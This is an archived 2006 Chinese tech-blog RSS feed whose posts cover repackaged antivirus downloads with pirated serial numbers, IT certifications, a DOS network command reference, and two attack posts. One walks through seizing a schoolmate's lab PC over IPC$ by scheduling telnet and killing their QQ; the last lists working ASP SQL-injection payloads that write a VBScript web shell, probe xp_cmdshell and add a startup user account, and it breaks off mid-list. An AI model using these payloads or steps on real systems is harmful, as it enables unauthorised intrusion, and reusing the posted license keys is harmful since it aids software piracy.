Antivirus系列是他们的拳头产品，Avast在许多重要的市场和权威评奖中都取得了骄人的成绩，同样在此后进军国际市场上也赢得了良好的增长率。 <br />主要特点： <br />（1）高侦测的反病毒表现，多次获得过ICSA和Virus Bulletin 100%认证，启发式强大。 <br />（2）较低的内存占用和直观，简洁的使用界面。 <br />（3）支持SKIN更换，完善的程序内存检测 <br />（4）对SMTP/POP3/IMAP邮件收发监控的全面保护。 <br />（5）支持MS OUTLOOK外挂，智能型邮件帐号分析。 <br />（6）支持宏病毒文档修复，修复档案后自动产生病毒还原数据库（VRDB功能）。 <br />（7）支持P2P共享下载软件和即时通讯病毒检测，保护全面。 <br />（8）良好有效的侦测并清除病毒，如虫，广告和木马程序 <br />（9）病毒库更新速度快，对新型病毒和木马有迅捷的反应。 <br />功能特性如下： <br />＊反病毒内核 <br />＊自动升级 <br />＊简单的使用界面 <br />＊病毒隔离区 <br />＊实时监控 <br />＊系统结合　 <br />＊P2P和聊天软件监控保护 <br />＊病毒清除 <br />＊网络防护 <br />＊64位系统支持 <br />＊网页防护 <br />＊多国语言支持 <br />＊增强型用户界面 <br />＊恶意脚本屏蔽　　　　　　　 <br />＊DOS下扫描 <br />＊扩展病毒库升级　　　　　　 <br />＊移除病毒备份 <br />占用内存不到25兆,让你老机器也流畅 <br />序列号：S6039686R6039W1106-FBYVE2MU 有效期2009.5.6 升级有效期2010.1.1 <br />S7935192R4371Z1106-S1BJD5AJ 有效期2012.1.6 升级有效期2008.8.1 <br />S6945137R6826L1106-WXH4K1SJ 有效期2008.4.6 升级有效期2010.9.1 <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />2000系统 <br />第一次运行只要运行install2000.bat文件即可，如果第二次的话直接运行ashAvast.exe即可 <br />xp,2003系统 <br />第一次运行只要运行installxp.bat文件即可，如果第二次的话直接运行ashAvast.exe即可 <br />卸载说明： <br />卸载也能做到智能化，2000系统只需要运行uninstall2000.bat文件，xp系统只需要运行uninstall2000.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"和系统目录里面的所有文件 <br />http://down.safechina.net/lvse/16.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/16.rar <br /><br />17.【原创】东方卫士2007 智能绿色中文可在线升级版 病毒库 0614 <br />软件介绍: 免费升级序列号：DFV3-PBTT0601-05357939-1219 <br />　　东方卫士 V3 （ 2007 ）智能防毒软件，在防毒功能和特色功能上作了深入改进，具有超强的病毒查杀能力。在防止个人资料被盗用方面，针对 Adware 、Spyware 、木马病毒以及保护网游账号、银行密码等极大的增强了防护和查杀功能。 <br />目前免费使用，免费升级！ <br />安装说明: <br />解压文件到任意盘符下面,我已经用批处理文件智能把要安装的文件安装到指定目录中，不需要手工复制粘贴了 <br />第一次运行只要运行install.bat文件即可，如果第二次的话直接运行DFVSX.exe即可 <br />卸载说明： <br />卸载也能做到智能化，只需要运行uninstall.bat文件，不仅仅删除注册表内容，还删除了复制到"C:\Program Files\"的所有文件 <br />此版本在多个平台测试无问题，可在线升级 <br />http://down.safechina.net/lvse/17.rar <br />备选地址:http://www5.fixdown.com/doskill/lvse/17.rar <br /><img src ="http://www.cnitblog.com/crazystone/aggbug/18175.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-20 06:57 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/20/18175.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>各类技术认证</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/20/18174.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Thu, 19 Oct 2006 21:20:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/20/18174.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18174.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/20/18174.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18174.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18174.html</trackback:ping><description><![CDATA[一、Cisco职业认证<br /><br />　　思科系统公司是全球最大的互联网设备供应商。由于Cisco公司在业界的主导地位及认证体系的科学性，Cisco职业认证现已经成为全球网络技术人员最受认可的、权威的职业认证。思科职业认证体系主要分为以下三个级别。<br /><br />　　Associate （助理工程师）：思科职业认证的初级认证，是网络职业认证的第一步，这是一个助理级的网络认证，包括CCNA和CCDA两类，获得CCNA或CCDA认证，能够证明持证人具备网络基础技能。 <br /><br />　　Professional（资深工程师）：是思科职业认证的中级认证，也是专业级别的认证，包括CCDP、CCNP、CCIP、CCSP四种认证，每种认证的发展方向不同，取决于个人的职业发展方向，通过该级别认证表示你具备高级的、专业的网络技术。<br /><br />　　Expert（专家）：是思科认证体系中最高级别的认证，鉴别专家对网络的理解能力，精细驾驭复杂网络的能力，以及解决端到端网络中固有或潜在的缺陷，要想成为一名CCIE必须通过笔试资格考试和动手实验考试。 其中CCIE网络专家目前分为四类：Routing and Switching（路由与交换）、Service Provider （服务供应商）Security (安全)、Voice（语音）。<br /><br />　　提示：从技术要求上来讲，CCNA重点关注相对简单的网络，而CCNP拥有安装，配置，操作及诊断包括局域网/广域网路由和局域网交换的更加复杂的Cisco网络所需要的专业技能。CCIE是在Cisco职业认证体系下的最高认证级别，除与CCNP级别相关的知识外，它至少代表着2年的在职经验。CCIE有四种类型：CCIE-路由和交换，CCIE-通信和服务；CCIE-安全；CCIE-语音。<br /><br />二、华为3Com培训认证体系<br /><br />　　作为业界领先的端到端网络解决方案供应商，华为公司按照技术应用场合的不同，为客户提供了从网络工程师到网络专家的三级技术认证体系。主要包括网络工程师、高级网络工程师、网络互联专家、销售工程师及销售专家等一系列的认证项目。<br /><br />　　华为认证网络工程师（HCNE）：主要面向中小型企业的网络设计与实施人员。通过认证后，证明学员对数据通信网络有了一个全面的了解，同时掌握面向中小型企业的网络通用技术，并具备设计中小企业网络以及使用华为网络设备实施您的设计的能力。<br /><br />　　华为认证高级网络工程师（HCSE）： 认证适合大中型企业的网络设计与实施人员、通过HCNE认证人员等，学员只要通过了HCNE认证就可以参加高级网络工程师认证培训。<br /><br />　　华为认证网络互联专家（HCIE）：主要面向从事运营商或行业客户的网络设计与实施人员。该项认证充分体现了华为公司在运营商级别网络搭建方面的优势。通过认证，学员被证明已经掌握面向运营商网络的通用技术，胜任从行业客户到运营商的全方位网络设计和维护工作，同时还具备了使用华为网络设备实施您的设计的能力。<br /><br />　　提示：华为3Com认证考试由Prometric考试服务公司代理，由Prometric分布在全国的考试中心（APTC)负责具体实施。可登录Prometric网站http://www.prometric.com.cn查询考场和注册流程。关于此类认证体系的详细内容可参看其官方说明或登陆以下网址查询：http://huawei.jxufe.edu.cn/ren*********jie.htm<br /><br />三、微软认证体系<br /><br />　　微软认证考试是微软公司推出的计算机高级技术人员认证考试，是全球公认的计算机软件高级人才认证，有比尔-盖茨签发的证书在全球90多个国家均得到承认。国内的微软认证有四种：微软认证产品专家（MCP）、微软认证系统工程师（MCSE）、微软软件开发专家（MCSD）、微软认证数据库管理员（MCDBA）。而能够体现网管员价值的主要是MCSE和MCDBA两类。<br /><br />　　MCSE：MCSE微软认证系统工程师证书是行业中承认范围最广的一项高级技术证书。获得MCSE证书，证明自己具备使用高级的Microsoft Windows平台和Microsoft服务器产品，为企业提供成功的设计、实施和管理商业解决方案的能力。<br /><br />　　MCDBA：证明持用者有能力利用Microsoft SQL Server 实现和管理数据库，从事逻辑或物理数据库的设计和开发，利用Transact-SQL开拓数据库业务，管理和维护数据库，配置和管理安全系统，控制和强化数据库等技术服务。<br /><br />　　提示：MCSE的培训目标是系统工程师、技术支持工程师、系统分析员、网络分析员和技术顾问；而MCDBA的培训目标主要是数据库管理员、数据库分析员和数据库开发人员。<br /><br />四、红旗Linux认证<br /><br />　　此类认证是网络管理员掌握Linux内核系统最权威的认证之一。它针对从未使用过Linux 或者UNIX而且在任何操作系统也没有命令系统使用经验并且想学会GUI 和命令系统来使用和定制自己的红旗Linux 工作站的在职人员。主要分为Linux产品应用专家（RAP）和Linux认证工程师（RCE）两个等级。<br /><br />　　红旗Linux产品应用专家（RAP）：主要学习红旗Linux桌面版的安装方式，GUI（图形用户界面）方式的硬件配置，桌面环境的个性化管理，菜单命令的使用，利用终端的文字命令以及对文件的管理，如果软盘、光盘的使用，局域网络资源共享，用户管理，上网、下载等网络应用，常用应用软件介绍以用在Linux环境中的开发等。<br /><br />　　红旗Linux认证工程师（RCE）：学习系统管理技术，掌握操作系统的定制，并达到会在现有网络上配属和设定网络的Linux用户。安装、维护、Shell高级编程、系统优化、Samba、X Windows(GNOME/KDE)、Kernel、本地系统安全管理；设定常用网络服务管理的Linux- 和/或 UNIX-网络管理员。TCP/IP、LAN、Ethernet、路由及其协议、DNS、Apache、NFS、Samba、Sendmail、PPP、DHCP、网络管理及安全、IPChains 等。<br /><br />　　提示：Linux操作系统由于其代码开放的特点，越来越多的企业开始使用此类操作系统构建网络环境。通过此类认证的网管员，能够设置Linux服务器和配置基本网络服务，维护系统的安全性和管理网络系统的正常运行。<br /><br />五、中国网络管理师<br /><br />　　中国网络管理师简称中国网管师，是由信息产业部电子教育中心作了互证，网服天下国际咨询顾问（北京）有限公司全国制定并运营推广的全国信息技术职业资格认证。此认证是为了提高中国网管的技术水平，加强中国网管整体的职业素养，优化中国信息化基础建设而设。<br /><br />　　它旨在培养网络管理员在网络操作系统、网络数据库、网络设备、网络管理、网络安全、应用开发、职业素养等各方面的扎实理论知识和较强的实践能力。此认证目前在进一步的完善中，不久之后即会正式向外推出。<br /><br />　　总结：<br /><br />　　除了以上被业内广泛认可的热门认证外，全国计算机等级考试中的网络管理员考试以及国家软件水平资格考试中的网络管理员/网络工程师考试，也能较好的体现一名网管员的知识技能。而不管是何种认证考试，注意理论与实践的结合，切实将认证所学知识运用于实际管理当中才是真。 <img src ="http://www.cnitblog.com/crazystone/aggbug/18174.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-20 05:20 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/20/18174.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>简单的命令控制同一局域网内的电脑</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/20/18173.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Thu, 19 Oct 2006 20:05:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/20/18173.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18173.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/20/18173.html#Feedback</comments><slash:comments>2</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18173.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18173.html</trackback:ping><description><![CDATA[
		<p>今天给大家讲一下如何用简单的命令控制同一局域网内的电脑.方法很简单,但危害不容忽视.<br />我们学校机房都是WIN2000的操作系统,可以用来实现.大家看我演示<br />我的机器号是K3机房其它机器的号码也是这样按顺序排的，我的机器号是K3，我们就用K5做实验</p>
		<p>
				<br />使用条件：开放了23端口</p>
		<p>nbtstat -an  察看本机的机型号吗<br />net use \k5     ’和K5号机建立连接<br />net time \k5    ’查看K5号机的当前时间<br />at \k5 19:26 /every:saturday net start telnet   ‘给K5号机新增一个计划，使它在每周六的晚上7：26打开TELNET服务，使我们可以远程登陆它<br />  等到26分就可以登陆了<br />看，我们已经开启了对方的TELNET服务并登陆对方机器，因为是同一局域网，所以可以方便的上传些东西<br />因为建立了连接所以可以方便的进入对方目录<br />上传了个可以查看并杀掉对方进程的工具<br />这样把他电脑里的QQ都给关了，还有很多用处就有大家去想了<br />防范方法：net share ipc$ /del ’关闭IPC就可以了</p>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18173.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-20 04:05 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/20/18173.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>DOS下一些很有用的命令</title><link>http://www.cnitblog.com/crazystone/archive/2006/10/20/18171.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Thu, 19 Oct 2006 19:59:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/20/18171.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18171.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/20/18171.html#Feedback</comments><slash:comments>0</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18171.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18171.html</trackback:ping><description><![CDATA[
		<font size="2">DOS下常用网络相关命令解释 <br />Arp <br />显示和修改“地址解析协议”(ARP) 所使用的到以太网的 IP 或令牌环物理地址翻译表。该命令只有在安装了 TCP/IP 协 <br />议之后才可用。 <br /><br />arp -a [inet_addr] [-N [if_addr]] <br /><br /><br />arp -d inet_addr [if_addr] <br /><br /><br />arp -s inet_addr ether_addr [if_addr] <br /><br /><br />参数 <br /><br /><br />-a <br /><br /><br /><br />在 ARP 缓存中添加项，将 IP 地址 inet_addr 和物理地址 ether_addr 关联。物理地址由以连字符分隔的 6 个十六进制 <br />字节给定。使用带点的十进制标记指定 IP 地址。项是永久性的，即在超时到期后项自动从缓存删除。 <br /><br /><br />ether_addr <br /><br /><br />指定物理地址。 <br /><br /><br /><br />Finger <br />在运行 Finger 服务的指定系统上显示有关用户的信息。根据远程系统输出不同的变量。该命令只有在安装了 TCP/IP 协 <br />议之后才可用。 <br /><br /><br />finger [-l] [user]@computer[...] <br /><br /><br />参数 <br /><br /><br />-l <br /><br /><br />以长列表格式显示信息。 <br /><br /><br />user <br /><br /><br />指定要获得相关信息的用户。省略用户参数以显示指定计算机上所有用户的信息： <br /><br /><br />@computer <br /><br /><br /><br />Ftp <br />将文件传送到正在运行 FTP 服务的远程计算机或从正在运行 FTP 服务的远程计算机传送文件（有时称作 daemon）。Ftp <br />可以交互使用。单击“相关主题”列表中的“ftp 命令”以获得可用的“ftp”子命令描述。该命令只有在安装了 TCP/IP <br />协议之后才可用。Ftp 是一种服务，一旦启动，将创建在其中可以使用 ftp 命令的子环境，通过键入 quit 子命令可以从 <br />子环境返回到 Windows 2000 命令提示符。当 ftp 子环境运行时，它由 ftp 命令提示符代表。 <br /><br /><br />ftp [-v] [-n] [-i] [-d] [-g] [-s:filename] [-a] [-w:windowsize] [computer] <br /><br /><br />参数 <br /><br /><br />-v <br /><br /><br />禁止显示远程服务器响应。 <br /><br /><br />-n <br /><br /><br />禁止自动登录到初始连接。 <br /><br /><br />-i <br /><br /><br />多个文件传送时关闭交互提示。 <br /><br /><br />-d <br /><br /><br />启用调试、显示在客户端和服务器之间传递的所有 ftp 命令。 <br /><br /><br />-g <br /><br /><br />禁用文件名组，它允许在本地文件和路径名中使用通配符字符（* 和 ?）。（请参阅联机“命令参考”中的 glob 命 <br />令。） <br /><br /><br />-s: filename <br /><br /><br />指定包含 ftp 命令的文本文件；当 ftp 启动后，这些命令将自动运行。该参数中不允许有空格。使用该开关而不是重定 <br />向 (&gt; )。 <br /><br /><br />-a <br /><br /><br />在捆绑数据连接时使用任何本地接口。 <br /><br /><br />-w:windowsize <br /><br /><br />替代默认大小为 4096 的传送缓冲区。 <br /><br /><br />computer <br /><br /><br />指定要连接到远程计算机的计算机名或 IP 地址。如果指定，计算机必须是行的最后一个参数。 <br /><br /><br /><br />Nbtstat <br />该诊断命令使用 NBT（TCP/IP 上的 NetBIOS）显示协议统计和当前 TCP/IP 连接。该命令只有在安装了 TCP/IP 协议之后 <br />才可用。 <br /><br /><br />nbtstat [-a remotename] [-A IP address] [-c] [-n] [-R] [-r] [-S] [-s] [interval] <br /><br /><br />参数 <br /><br /><br />-a remotename <br /><br /><br />使用远程计算机的名称列出其名称表。 <br /><br /><br />-A IP address <br /><br /><br />使用远程计算机的 IP 地址并列出名称表。 <br /><br /><br />-c <br /><br /><br />给定每个名称的 IP 地址并列出 NetBIOS 名称缓存的内容。 <br /><br /><br />-n <br /><br /><br />列出本地 NetBIOS 名称。“已注册”表明该名称已被广播 (Bnode) 或者 WINS（其他节点类型）注册。 <br /><br /><br />-R <br /><br /><br />清除 NetBIOS 名称缓存中的所有名称后，重新装入 Lmhosts 文件。 <br /><br /><br />-r <br /><br /><br />列出 Windows 网络名称解析的名称解析统计。在配置使用 WINS 的 Windows 2000 计算机上，此选项返回要通过广播或 <br />WINS 来解析和注册的名称数。 <br /><br /><br />-S <br /><br /><br />显示客户端和服务器会话，只通过 IP 地址列出远程计算机。 <br /><br /><br />-s <br /><br /><br />显示客户端和服务器会话。尝试将远程计算机 IP 地址转换成使用主机文件的名称。 <br /><br /><br />interval <br /><br /><br />重新显示选中的统计，在每个显示之间暂停 interval 秒。按 CTRL+C 停止重新显示统计信息。如果省略该参数， <br />nbtstat 打印一次当前的配置信息。 <br /><br /><br /><br />Netstat <br />显示协议统计和当前的 TCP/IP 网络连接。该命令只有在安装了 TCP/IP 协议后才可以使用。 <br /><br /><br />netstat [-a] [-e] [-n] [-s] [-p protocol] [-r] [interval] <br /><br /><br />参数 <br /><br /><br />-a <br /><br /><br />显示所有连接和侦听端口。服务器连接通常不显示。 <br /><br /><br />-e <br /><br /><br />显示以太网统计。该参数可以与 -s 选项结合使用。 <br /><br /><br />-n <br /><br /><br />以数字格式显示地址和端口号（而不是尝试查找名称）。 <br /><br /><br />-s <br /><br /><br />显示每个协议的统计。默认情况下，显示 TCP、UDP、ICMP 和 IP 的统计。-p 选项可以用来指定默认的子集。 <br /><br /><br />-p protocol <br /><br /><br />显示由 protocol 指定的协议的连接；protocol 可以是 tcp 或 udp。如果与 -s 选项一同使用显示每个协议的统计， <br />protocol 可以是 tcp、udp、icmp 或 ip。 <br /><br /><br />-r <br /><br /><br />显示路由表的内容。 <br /><br /><br />interval <br /><br /><br />重新显示所选的统计，在每次显示之间暂停 interval 秒。按 CTRL+B 停止重新显示统计。如果省略该参数，netstat 将 <br />打印一次当前的配置信息。 <br /><br /><br /><br />Ping <br />验证与远程计算机的连接。该命令只有在安装了 TCP/IP 协议后才可以使用。 <br /><br /><br />ping [-t] [-a] [-n count] [-l length] [-f] [-i ttl] [-v tos] [-r count] [-s count] [[-j computer-list] | [- <br />k computer-list]] [-w timeout] destination-list <br /><br /><br />参数 <br /><br /><br />-t <br /><br /><br />Ping 指定的计算机直到中断。 <br /><br /><br />-a <br /><br /><br />将地址解析为计算机名。 <br /><br /><br />-n count <br /><br /><br />发送 count 指定的 ECHO 数据包数。默认值为 4。 <br /><br /><br />-l length <br /><br /><br />发送包含由 length 指定的数据量的 ECHO 数据包。默认为 32 字节；最大值是 65,527。 <br /><br /><br />-f <br /><br /><br />在数据包中发送“不要分段”标志。数据包就不会被路由上的网关分段。 <br /><br /><br />-i ttl <br /><br /><br />将“生存时间”字段设置为 ttl 指定的值。 <br /><br /><br />-v tos <br /><br /><br />将“服务类型”字段设置为 tos 指定的值。 <br /><br /><br />-r count <br /><br /><br />在“记录路由”字段中记录传出和返回数据包的路由。count 可以指定最少 1 台，最多 9 台计算机。 <br /><br /><br />-s count <br /><br /><br />指定 count 指定的跃点数的时间戳。 <br /><br /><br />-j computer-list <br /><br /><br />利用 computer-list 指定的计算机列表路由数据包。连续计算机可以被中间网关分隔（路由稀疏源）IP 允许的最大数量 <br />为 9。 <br /><br /><br />-k computer-list <br /><br /><br />利用 computer-list 指定的计算机列表路由数据包。连续计算机不能被中间网关分隔（路由严格源）IP 允许的最大数量 <br />为 9。 <br /><br /><br />-w timeout <br /><br /><br />指定超时间隔，单位为毫秒。 <br /><br /><br />destination-list <br /><br /><br />指定要 ping 的远程计算机。 <br /><br /><br />Rcp <br />在 Windows 2000 计算机和运行远程外壳端口监控程序 rshd 的系统之间复制文件。rcp 命令是一个连接命令，从 <br />Windows 2000 计算机发出该命令时，也可以用于其他传输在两台运行 rshd 的计算机之间复制文件。rshd 端口监控程序 <br />可以在 UNIX 计算机上使用，而在 Windows 2000 上不能使用，所以 Windows 2000 计算机仅可以作为发出命令的系统参 <br />与。远程计算机必须也通过运行 rshd 提供 rcp 实用程序。 <br /><br /><br />rcp [-a | -b] [-h] [-r] source1 source2 ... sourceN destination <br /><br /><br />参数 <br /><br /><br />-a <br /><br /><br />指定 ASCII 传输模式。此模式在传出文件上将回车/换行符转换为回车符，在传入文件中将换行符转换为回车/换行符。该 <br />模式为默认的传输模式。 <br /><br /><br />-b <br /><br /><br />指定二进制图像传输模式。没有执行回车/换行符转换。 <br /><br /><br />-h <br /><br /><br />传输 Windows 2000 计算机上标记为隐藏属性的源文件。如果没有该选项，在 rcp 命令行上指定隐藏文件的效果与文件不 <br />存在一样。 <br /><br /><br />-r <br /><br /><br />将源的所有子目录内容递归复制到目标。source 和 destination 都必须是目录，虽然即使源不是目录，使用 -r 也能够 <br />工作。但将没有递归。 <br /><br /><br />source 和 destination <br /><br /><br />格式必须为 [computer[.user]:]filename。如果忽略了 [computer[.user]:] 部分，计算机将假定为本地计算机。如果省 <br />略了 [.user] 部分，将使用当前登录的 Windows 2000 用户名。如果使用了完全合格的计算机名，其中包含句点 (.) 分 <br />隔符，则必须包含 [.user]。否则，计算机名的最后部分将解释为用户名。如果指定了多个源文件，则 destination 必须 <br />是目录。 <br /><br /><br />如果文件名不是以 UNIX 的正斜杠 (/) 或 Windows 2000 系统的反斜杠 (\) 打头，则假定相对于当前的工作目录。在 <br />Windows 2000 中，这是发出命令的目录。在远程系统中，这是远程用户的登录目录。句点 (.) 表示当前的目录。在远程 <br />路径中使用转义字符（\、" 或 '），以便在远程计算机中使用通配符。 <br /><br /><br />Rexec <br />在运行 REXEC 服务的远程计算机上运行命令。rexec 命令在执行指定命令前，验证远程计算机上的用户名，只有安装了 <br />TCP/IP 协议后才可以使用该命令。 <br /><br /><br />rexec computer [-l username] [-n] command <br /><br /><br />参数 <br /><br /><br />computer <br /><br /><br />指定要运行 command 的远程计算机。 <br /><br /><br />-l username <br /><br /><br />指定远程计算机上的用户名。 <br /><br /><br />-n <br /><br /><br />将 rexec 的输入重定向到 NULL。 <br /><br /><br />command <br /><br /><br />指定要运行的命令。 <br /><br /><br />Route <br />控制网络路由表。该命令只有在安装了 TCP/IP 协议后才可以使用。 <br /><br /><br />route [-f] [-p] [command [destination] [mask subnetmask] [gateway] [metric costmetric]] <br /><br /><br />参数 <br /><br /><br />-f <br /><br /><br />清除所有网关入口的路由表。如果该参数与某个命令组合使用，路由表将在运行命令前清除。 <br /><br /><br />-p <br /><br /><br />该参数与 add 命令一起使用时，将使路由在系统引导程序之间持久存在。默认情况下，系统重新启动时不保留路由。与 <br />print 命令一起使用时，显示已注册的持久路由列表。忽略其他所有总是影响相应持久路由的命令。 <br /><br /><br />command <br /><br /><br />指定下列的一个命令。 <br /><br /><br />命令 目的 <br />print 打印路由 <br />add 添加路由 <br />delete 删除路由 <br />change 更改现存路由 <br /><br /><br />destination <br /><br /><br />指定发送 command 的计算机。 <br /><br /><br />mask subnetmask <br /><br /><br />指定与该路由条目关联的子网掩码。如果没有指定，将使用 255.255.255.255。 <br /><br /><br />gateway <br /><br /><br />指定网关。 <br /><br /><br />名为 Networks 的网络数据库文件和名为 Hosts 的计算机名数据库文件中均引用全部 destination 或 gateway 使用的符 <br />号名称。如果命令是 print 或 delete，目标和网关还可以使用通配符，也可以省略网关参数。 <br /><br /><br />metric costmetric <br /><br /><br />指派整数跃点数（从 1 到 9999）在计算最快速、最可靠和（或）最便宜的路由时使用。 <br /><br /><br />Rsh <br />在运行 RSH 服务的远程计算机上运行命令。该命令只有在安装了 TCP/IP 协议后才可以使用。 <br /><br /><br />rsh computer [-l username] [-n] command <br /><br /><br />参数 <br /><br /><br />computer <br /><br /><br />指定运行 command 的远程计算机。 <br /><br /><br />-l username <br /><br /><br />指定远程计算机上使用的用户名。如果省略，则使用登录的用户名。 <br /><br /><br />-n <br /><br /><br />将 rsh 的输入重定向到 NULL。 <br /><br /><br />command <br /><br /><br />指定要运行的命令。 <br /><br /><br />Tftp <br />将文件传输到正在运行 TFTP 服务的远程计算机或从正在运行 TFTP 服务的远程计算机传输文件。该命令只有在安装了 <br />TCP/IP 协议后才可以使用。 <br /><br /><br />tftp [-i] computer [get | put] source [destination] <br /><br /><br />参数 <br /><br /><br />-i <br /><br /><br />指定二进制图像传送模式（也称为“八位字节”）。在二进制图像模式中，文件一个字节接一个字节地逐字移动。在传送 <br />二进制文件时使用该模式。 <br /><br /><br />如果省略了 -i，文件将以 ASCII 模式传送。这是默认的传送模式。此模式将 EOL 字符转换为 UNIX 的回车符和个人计算 <br />机的回车符/换行符。在传送文本文件时应使用此模式。如果文件传送成功，将显示数据传输率。 <br /><br /><br />computer <br /><br /><br />指定本地或远程计算机。 <br /><br /><br />put <br /><br /><br />将本地计算机上的文件 destination 传送到远程计算机上的文件 source。 <br /><br /><br />get <br /><br /><br />将远程计算机上的文件 destination 传送到本地计算机上的文件 source。 <br /><br /><br />如果将本地计算机上的文件 file-two 传送到远程计算机上的文件 file-one，请指定 put。如果将远程计算机上的文件 <br />file-two 传送到远程计算机上的文件 file-one，请指定 get。 <br /><br /><br />因为 tftp 协议不支持用户身份验证，所以用户必须登录，并且文件在远程计算机上必须可以写入。 <br /><br /><br />source <br /><br /><br />指定要传送的文件。如果本地文件指定为 -，则远程文件在 stdout 上打印出来（如果获取），或从 stdin（如果放置） <br />读取。 <br /><br /><br />destination <br /><br /><br />指定将文件传送到的位置。如果省略了 destination，将假定与 source 同名。</font>
<img src ="http://www.cnitblog.com/crazystone/aggbug/18171.html" width = "1" height = "1" /><br><br><div align=right><a style="text-decoration:none;" href="http://www.cnitblog.com/crazystone/" target="_blank">stone</a> 2006-10-20 03:59 <a href="http://www.cnitblog.com/crazystone/archive/2006/10/20/18171.html#Feedback" target="_blank" style="text-decoration:none;">发表评论</a></div>]]></description></item><item><title>一些有用的ASP注入相关的命令 </title><link>http://www.cnitblog.com/crazystone/archive/2006/10/16/18046.html</link><dc:creator>stone</dc:creator><author>stone</author><pubDate>Mon, 16 Oct 2006 13:59:00 GMT</pubDate><guid>http://www.cnitblog.com/crazystone/archive/2006/10/16/18046.html</guid><wfw:comment>http://www.cnitblog.com/crazystone/comments/18046.html</wfw:comment><comments>http://www.cnitblog.com/crazystone/archive/2006/10/16/18046.html#Feedback</comments><slash:comments>1</slash:comments><wfw:commentRss>http://www.cnitblog.com/crazystone/comments/commentRss/18046.html</wfw:commentRss><trackback:ping>http://www.cnitblog.com/crazystone/services/trackbacks/18046.html</trackback:ping><description><![CDATA[
		<font size="2">1、 </font>
		<a href="http://192.168.1.5/display.asp?keyno=1881;exec&amp;n" target="_blank">
				<font size="2">http://192.168.1.5/display.asp?keyno=1881;exec&amp;n</font>
		</a>
		<font size="2"> ... mdshell 'echo ^&lt;script language=VBScript runat=server^&gt;execute request^("l"^)^&lt;/script^&gt; &gt;c:\mu.asp';-- <br />用^转义字符来写ASP文件的方法。<br /><br />2、 </font>
		<a href="http://192.168.1.5/display.asp?keyno=188&amp;nb" target="_blank">
				<font size="2">http://192.168.1.5/display.asp?keyno=188&amp;nb</font>
		</a>
		<font size="2"> ... lect @@VERSION) <br />显示SQL系统版本：<br />Microsoft VBScript 编译器错误 错误 '800a03f6' <br />缺少 'End' <br />/iisHelp/common/500-100.asp，行242 <br />Microsoft OLE DB Provider for ODBC Drivers 错误 '80040e07' <br />[Microsoft][ODBC SQL Server Driver][SQL Server]Syntax error converting the nvarchar value 'Microsoft SQL Server 2000 - 8.00.760 (Intel X86) Dec 17 2002 14:22:05 Copyright (c) 1988-2003 Microsoft Corporation Desktop Engine on Windows NT 5.0 (Build 2195: Service Pack 4) ' to a column of data type int. <br />/display.asp，行17<br />3、 我在检测索尼中国的网站漏洞时，分明已经确定了漏洞存在却无法在这三种漏洞中找到对应的类型。偶然间我想到了在SQL语言中可以使用"in"关键字进行查询，例如"select * from mytable where id in(1)"，括号中的值就是我们提交的数据，它的结果与使用"select * from mytable where id=1"的查询结果完全相同。所以访问页面的时候在URL后面加上") and 1=1 and 1 in(1"后原来的SQL语句就变成了"select * from mytable where id in(1) and 1=1 and 1 in(1)"，这样就会出现期待已久的页面了。暂且就叫这种类型的漏洞为"包含数字型"吧，聪明的你一定想到了还有"包含字符型"呢。对了，它就是由于类似"select * from mytable where name in('firstsee')"的查询语句造成的。<br /><br />4、 </font>
		<a href="http://192.168.1.5/display.asp?keyno=1" target="_blank">
				<font size="2">http://192.168.1.5/display.asp?keyno=1</font>
		</a>
		<font size="2"> ... p;1=(select count(*) FROM master.dbo.sysobjects where xtype = 'X' AND name = 'xp_cmdshell')<br />判断xp_cmdshell扩展存储过程是否存在。<br /><br />5、 </font>
		<a href="http://192.168.1.5/display.asp?keyno=188;EXEC%20master" target="_blank">
				<font size="2">http://192.168.1.5/display.asp?keyno=188;EXEC%20master</font>
		</a>
		<font size="2"> ... p;#39;HKEY_LOCAL_MACHINE','SOFTWARE\Microsoft\Windows\CurrentVersion\Run','help1','REG_SZ','cmd.exe%20/c%20net user test ptlove /add'<br />向启动组中写入命令行和执行程序<br /><br />6、 </font>
		<a href="http://192.168.1.5/display.asp?key" target="_blank">
